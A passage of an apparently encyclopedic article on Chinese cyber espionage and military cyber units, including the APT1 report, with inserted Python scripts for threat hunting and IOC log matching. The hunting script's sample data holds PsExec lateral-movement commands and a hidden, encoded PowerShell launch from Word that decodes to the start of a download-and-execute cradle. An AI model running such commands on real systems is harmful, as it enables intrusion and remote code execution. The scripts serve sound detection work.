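                 r"C:\Tools\PsExec.exe", r"psexec \\sat-ctl-02 -s cmd"),
    ProcessEvent("ws-ops-14", "j.lee", r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcessEvent("ws-ops-14", "j.lee", r"C:\Windows\System32\cmd.exe",
                 r"C:\Temp\PsExec.exe", r"PsExec.exe \\sat-ctl-02 -u corp\j.lee cmd"),
    ProcessEvent("ws-ops-09", "a.kim", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcessEvent("jump01", "svc-itops", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile -File C:\scripts\patch.ps1"),
]

if __name__ == "__main__":
    for ev, reasons in hunt(SAMPLE_EVENTS):
        print(f"{ev.host} {ev.user} {basename(ev.image)}: " + "; ".join(reasons))
```

The tool itself is never the signal. The same PsExec invocation is ignored from the jump host under the service account and flagged from a workstation under a user account, which is the only distinction a signature-free detection can make.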

"Disruption of satellites can lead to problems in the functioning of civilian and military facilities," said Symantec technical director Vikram Thakur.

According to him, the problem concerns all people. Satellites are extremely important for the normal operation of mobile devices, as well as for determining geolocation in many areas of life.

Symantec passed data on the cyber attack to the FBI and the US Department of Homeland Security. The competent authorities of the affected Asian countries were also notified of the incident.

According to Symantec, by June 20, 2018, hacked networks were protected from further penetration by hackers.[18]

US closes market from Huawei smartphones

A group of US lawmakers suspected Huawei's Mate 10 smartphones of being capable of spying on users, The Wall Street Journal reported in early 2018. The group sent a letter to the US Federal Communications Commission expressing concern that Huawei was allegedly cooperating with a certain broadcaster and with Chinese intelligence agencies, and accused the Chinese manufacturer of ignoring intellectual property rights.

As a result, one of the largest American mobile operators, AT&T, refused to sell the Huawei Mate 10. According to various media reports, the deal fell through under pressure from the FCC. As the authors of the letter hinted, a deal with AT&T could have strengthened Huawei's position in the US market and ultimately opened the way for the company's smartphones to be used by American officials.

2017

Indian authorities advise military to remove Chinese apps from phones due to surveillance risk

As became known on December 11, the Indian Ministry of Defence recommended that troops stationed on the Indian-Chinese border remove applications developed in China from their smartphones.

According to the recommendations, Chinese applications transfer user data to servers located in China and the Chinese government can use the information collected to determine the location of Indian troops.

The Ministry of Defence also compiled a list of 42 Android and iOS apps recommended for removal. The list includes several popular apps such as Weibo, WeChat, UC Browser and CM Browser.

Earlier, Indian authorities banned the use of Chinese equipment from Huawei and ZTE in the border region. Despite tensions between the two countries, there is no blanket ban on Chinese products in India. Any bans on Chinese goods apply only in the demarcation zone on the India-China border.

China approved a plan to create the first Internet court

As it became known on July 28, in China, during the 36th session of the Central Committee of the Communist Party of China on the comprehensive deepening of reforms, a plan was approved to create the country's first Internet court, CCTV reports.[19]


The Internet court, which will appear in Hangzhou, Zhejiang province, will consider exclusively cases related to cybercrime, including cases of online debt contracts, copyright infringement on the Internet, cases of online fraud, etc.

It is assumed that all judicial procedures, starting with the filing of a lawsuit, will be carried out on the court's website. The hearings will also be broadcast in real time.

The start date of the Internet court has not been announced.

As noted, the courts of Hangzhou already handle many cybercrime cases, and their number continues to grow: in 2013 about 600 such cases were heard, and in 2016 their number exceeded 10 thousand.

2016

Zecurion: China in second place in cyber military financing

Russia may be among the top five countries with the most developed cyber forces, that is, specialized cybersecurity units serving military or intelligence purposes. This is indicated by a Zecurion Analytics study cited by Kommersant.[20][21]

According to the study, the United States currently has the most developed cyber forces in the world. Analysts estimate state funding for this area in the US at about $7 billion a year, and the number of hackers cooperating with the state at 9 thousand people.

Zecurion put China in second place: funding for this area there may be $1.5 billion per year, and its cyber army is estimated as the largest, up to 20 thousand people.

The company declined to disclose exact figures for Russia; however, according to the publication's source in the information security market, Russia's spending on cyber forces is about $300 million per year, and the number of Russian cyber personnel is about 1 thousand people.

The top three is rounded out by the United Kingdom, which allocates $450 million a year to cyber troops numbering 2 thousand people. South Korea is in fourth place with a budget of $400 million per year and a staff of 700 hackers.

China threatened to use military force for its cybersecurity

China intends to take all necessary measures to ensure its information security, not excluding the use of military force. This was stated at a press conference in Beijing by Zhao Zeliang, head of the Cybersecurity Bureau of the Cyberspace Administration of the People's Republic of China.[22]

He also called for the creation of a "secure and controllable" Internet and presented a plan to audit all "key information products and services" supplied to the country by foreign companies. The sale of such products will be possible only after they pass the audit. Products intended for government organizations and industrial enterprises will be checked with particular rigor.

International relations factor

During the presidency of the current head of state Xi Jinping, the topic of cybersecurity has become a significant factor in international relations. China is regularly accused of carrying out targeted cyber attacks against other countries, while information about US cyber espionage operations has become public. Numerous accusations of cyber attacks are also heard against Russia.

It is known that the People's Liberation Army has at least two units responsible for military and intelligence operations in computer networks: units 61398 (the "2nd Bureau") and 61046 (the "8th Bureau"). The first is believed to specialize in cyber espionage against the USA and Canada, and the second against European countries.

New cybersecurity law adopted in China

In China, the standing committee of the National People's Congress adopted a new law on cybersecurity, according to which the storage of personal data of citizens should now be carried out only in the country.

In order to ensure cybersecurity, Chinese law enforcement agencies also got the opportunity to legally block the accounts of foreign companies and organizations that are suspected of destabilizing the information structure of the PRC.

Many international experts believe that in this way the PRC government is more likely to protect its IT services market, since citizens of the republic will be afraid to use foreign software and gadgets.

See also the Law on Personal Data No. 152-FZ in Russia.

Espionage by Chinese hackers

In May 2016, the information security company Symantec reported that it had tracked the hacking of a number of Indian resources carried out by the Chinese cyber spy group Suckfly. Among the resources were the systems of the central government and large financial institutions[23].

The data theft began in April 2014 and continued throughout 2015. Symantec believes the purpose of the espionage was to undermine India's economic infrastructure. In its operations, Suckfly uses spyware signed with stolen code-signing certificates, so that the software passes signature checks, along with the Backdoor.Nidiran malware.

A week later, Kaspersky Lab said it had tracked an intrusion by the Chinese-speaking cyber espionage group Danti into India's central government systems, delivered through diplomatic channels. The attack exploited CVE-2015-2545, a Microsoft Office vulnerability for which a patch was already available.

Both cases did not receive widespread coverage in India, and the attacked organizations did not comment. The lack of any serious reaction to cyber attacks by the Indian government makes the country vulnerable to further attacks, writes The Wire.

Official creation of a cyber army

On January 1, 2016, a military reform came into force in China, within the framework of which three new service branches were created. One of them, among other things, is responsible for national cybersecurity.

According to the Central Military Commission of the PRC, the People's Liberation Army gained an Army headquarters, a Rocket Force and a Strategic Support Force. The latter, in particular, will be responsible for the security of the digital domain. No further details of the cyber unit's activities have been disclosed.

Military reform came into force in China, under which three new branches of troops were created

According to Xi Jinping, President of the People's Republic of China and chairman of the Central Military Commission, the changes should contribute to the "realization of the Chinese dream of a strong army" in modern conditions.

"This is a strategic measure to form a modern military system taking into account Chinese features. This step will be a turning point in the modernization of the Chinese military system," the Chinese leader said during the ceremony at which banners were presented to the commanders of the newly created service branches.

The goal of the new military reform is to optimize the country's defense structure, strengthen the political system and civil-military integration. In addition, attention is paid to the construction of a modern military system with an understanding of Chinese specifics that can win modern information wars.

By the beginning of 2016, the Chinese army is the largest in the world, and the country is second only to the United States in terms of military spending. The total number of the armed forces of the PRC is estimated at about 2.3 million people against 5 million by the beginning of the 80s of the XX century. Most of the cuts affected the ground forces.[24]

2015: China's cyber warfare not only defends itself

On March 19, 2015, the official military encyclopedia of the People's Liberation Army of China revealed the existence of Chinese cyber units whose combat mission is not only defense but also attacks on the networks of foreign states. Beijing had previously categorically denied any involvement in cyber attacks.[25]

The Chinese armed forces include special units that carry out cyber attacks on the computer networks of foreign countries, according to the latest edition of the encyclopedia The Science of Military Strategy, published in Chinese by the People's Liberation Army and described as "the best manual on the Chinese military machine."

According to The Daily Beast, citing the encyclopedia, there are two hacker units in China. One of them is under the armed forces, the second is part of the intelligence services.

In addition, some non-governmental "external groups" work. They can be organized and mobilized as needed, quotes The Daily Beast excerpts from the encyclopedia.

"We first found out about it. For the first time, they told us literally this: 'Yes, we have the forces conducting attacks in cyberspace. And we have as many as two divisions whose work is devoted to this,'" Joe McReynolds, an analyst at the Center for Intelligence Research and Analysis at Defense Group, told The Daily Beast, explaining that one of them, according to the encyclopedia, operates under structures similar to the American CIA and FBI.

Beijing has always officially denied the participation of the Chinese authorities in attacks on the computer networks of foreign countries. Moreover, the latest edition of the Science of Military Strategy was published in December 2013. "It seems that they understood that we would not be able to prove it in any way, so they continued to insist that they were not engaged in cyber attacks," the expert suggested.

According to McReynolds, in full form, the book did not fall into the hands of American military experts immediately, but only in the summer of 2014. It took several more months to translate from Chinese.

The United States has been collecting evidence about the involvement of official Beijing in some attacks on its computer networks for several years. Last year, the US Department of Justice took the unprecedented step of indicting five Chinese military officials who, according to US intelligence, engage in diplomatic and industrial espionage through hacking into the networks of American authorities and enterprises.

In 2010, a cyber command was created in the United States. The American authorities assert that it is engaged exclusively in defending networks. That claim has also been called into question: in the same year, 2010, experts found that US intelligence agencies had carried out a series of attacks on Iranian nuclear facilities in order to disable them.

2013: Behind massive cyber attacks on the US is a Chinese organisation

Mandiant published a report in early 2013 suggesting that hundreds of cyber attacks on the US in recent years were the work of an organization based in China. The attacks were massive in scale: hundreds of terabytes of data were stolen from at least 141 organizations.

The intruders steal intellectual property and can remain covertly present on a system for a year or more, conducting surveillance, writes Mandiant, which has a dedicated group for analyzing cyber attacks. The firm believes it has found sufficient evidence to link the attacks to one of more than 20 cyber espionage groups operating under the cover of the Chinese government.

Mandiant analyzed the activities of the APT1 group and documented its intrusions over seven years. In its report, titled "APT1: Exposing One of China's Cyber Espionage Units," the firm writes that it has strong evidence placing the group in Shanghai, but that the activity directly observed by Mandiant's specialists accounts for only a fraction of its cyber espionage.

"The details we analyzed in hundreds of inspections convince us that the groups carrying out these activities are located mainly in China and that the government of this country is well aware of them," the firm wrote in its report. "Our observations indicate that in terms of the amount of information stolen, this is one of the most 'prolific' cyber espionage groups."

The tactics of the Chinese intruders are diverse and include social engineering, spearphishing, remote access tools and more than 40 malware families.

In its report, Mandiant listed thousands of indicators of compromise, including domain names and IP addresses, that could point to APT1 activity. The report is accompanied by the digital certificates used by the group and by video recordings showing the hackers' real actions. A free utility for identifying infected systems is also provided.

The intruders kept companies from 20 major industries under "surveillance," Mandiant writes. Periodically, over months or years, they returned to a compromised network to steal technical drawings, information about proprietary manufacturing processes, test results, business plans, pricing information, partnership agreements, emails and the contact lists of the organizations' executives. At least one organization had been under such observation for nearly five years before it was discovered.
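The practical use of the indicators described above is to sweep existing network logs for them and, for every host that hits, reconstruct how long the contact lasted, which is how dwell times like the five years mentioned here are established. The following is an added example of that sweep, not code from the page or from Mandiant. The domains, the 203.0.113.0/24 block (TEST-NET-3), the hostnames and the proxy log lines are constructed for illustration and are not the indicators published in the APT1 report.

```python
"""Match network IOCs against proxy log lines and estimate per-host dwell time.

Added example: the IOCs, hosts and log lines below are constructed for
illustration and are NOT the indicators from Mandiant's APT1 report.
"""
from __future__ import annotations

import ipaddress
import re
from datetime import datetime

# Constructed indicator set: two domains plus a CIDR block from TEST-NET-3.
IOC_DOMAINS = {"update-check.example.net", "cdn-static.example.org"}
IOC_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]

# Constructed proxy log format: "<ISO timestamp> <host> <dst_name> <dst_ip> <bytes>"
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z)\s+(?P<host>\S+)\s+"
    r"(?P<dst>\S+)\s+(?P<dst_ip>\S+)\s+(?P<bytes>\d+)$"
)

SAMPLE_LOG = """\
2011-03-02T08:15:22Z ws-fin-07 update-check.example.net 203.0.113.10 5120
2011-03-02T09:01:05Z ws-fin-07 www.example.com 198.51.100.5 2048
2011-06-14T22:47:10Z ws-fin-07 mail.update-check.example.net 203.0.113.12 1048576
2011-06-15T01:12:44Z ws-eng-03 cdn-static.example.org 203.0.113.40 40960
2011-06-15T01:13:00Z ws-eng-03 example.com 203.0.113.41 512
2011-06-16T10:00:00Z ws-hr-01 www.example.com 198.51.100.8 1024
"""


def matched_domain(name: str) -> str | None:
    """Return the IOC domain that `name` equals or is a subdomain of, else None."""
    name = name.lower().rstrip(".")
    for ioc in IOC_DOMAINS:
        if name == ioc or name.endswith("." + ioc):
            return ioc
    return None


def matched_network(ip_text: str) -> str | None:
    """Return the IOC network containing `ip_text`, or None (also for non-IP text)."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return None
    for net in IOC_NETWORKS:
        if ip in net:
            return str(net)
    return None


def scan(log_text: str) -> dict[str, dict]:
    """Per host: hit count, first/last hit, dwell window in days, matched indicators."""
    report: dict[str, dict] = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than abort the whole sweep
        indicators = {i for i in (matched_domain(m["dst"]), matched_network(m["dst_ip"])) if i}
        if not indicators:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        entry = report.setdefault(
            m["host"], {"hits": 0, "first": ts, "last": ts, "indicators": set()}
        )
        entry["hits"] += 1
        entry["first"] = min(entry["first"], ts)
        entry["last"] = max(entry["last"], ts)
        entry["indicators"] |= indicators
    for entry in report.values():
        entry["dwell_days"] = (entry["last"] - entry["first"]).days
    return report


if __name__ == "__main__":
    for host, e in scan(SAMPLE_LOG).items():
        print(f"{host}: {e['hits']} hits, {e['first'].date()} to {e['last'].date()} "
              f"({e['dwell_days']} days), indicators {sorted(e['indicators'])}")
```

Two details matter in practice: subdomains of an indicator domain are treated as hits, since operators rotate host labels under a controlled zone, and an IP hit without a domain hit (the second ws-eng-03 line) is still reported, because direct-to-IP beacons leave no DNS name to match. The dwell figure is only a lower bound: it is the span between the first and last logged contact, and log retention shorter than the intrusion truncates it.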

In a single month of 2011, APT1 penetrated the networks of 17 organizations; 87% of the observed victim organizations are located in English-speaking countries, Mandiant writes.

The firm believes APT1 is sponsored by the Chinese government. Its experts traced the attacks to four large networks in Shanghai and identified substantial infrastructure, command servers, tools and tactics.

The scale of the infrastructure the intruders rely on is impressive: 937 command servers hosted on 849 distinct IP addresses in 13 countries. To manage infected systems, the group used remote desktop sessions from abroad. Mandiant believes hundreds of people could be behind these attacks.

"Given the scale, duration and type of activity, APT1 operators had to rely on direct support from linguists, open-source researchers, malware authors and industry experts who translate customers' requirements into tasking for operators, as well as people who then deliver the stolen information to customers," the report said. "The APT1 group must also have significant IT staff engaged in purchasing and maintaining computer equipment, and people handling finance, logistics and administration."

Notes

  1. The unexplored MgBot framework is used by China in espionage campaigns in Africa
  2. Chinese cyber spies distribute malware through antiviruses
  3. China accused the United States of hacking computers to organize cyber attacks on Russia and Ukraine
  4. China drafts three-year plan to boost its cybersecurity industry amid increasing concerns for data safety
  5. Cyber Capabilities and National Power: A Net Assessment, https://www.iiss.org/blogs/research-paper/2021/06/cyber-capabilities-national-power
  6. In terms of its capabilities in cyberspace, China is 10 years behind the United States
  7. China's People's Liberation Army may be behind the attack on the Japanese space agency
  8. Chinese cyber spies steal 5G data around the world
  9. Technical Analysis of Operation Diànxùn
  10. Taiwan accused Beijing of cyber attacks on government agencies
  11. The PRC will introduce new cybersecurity rules for critical infrastructure
  12. The 'Great Cannon' has been deployed again
  13. China is again using the Great Cannon for DDoS attacks
  14. Chinese hackers hacked HPE, IBM and six other largest IT providers in the world
  15. Chinese intelligence intercepted the NSA hacker tools and attacked US allies with them
  16. Chinese cyber spies intercepted the diplomatic correspondence of the EU countries for three years
  17. Chinese "cybersecurity standards" are aimed at combating competitors
  18. China-based hack hit satellite firms: Symantec
  19. China approves decision to establish the country's first Internet court
  20. Cyber warfare was introduced to the Internet
  21. Analysts named Russia among the five countries with the best cyber warfare
  22. CNews: China threatened to use military force for its cybersecurity
  23. Pakistan and China mercilessly hit the government IT systems of India
  24. It's (Finally) Official: China Creates Cyberwarfare Military Branch
  25. China let slip about its state army of hackers and participation in cyber wars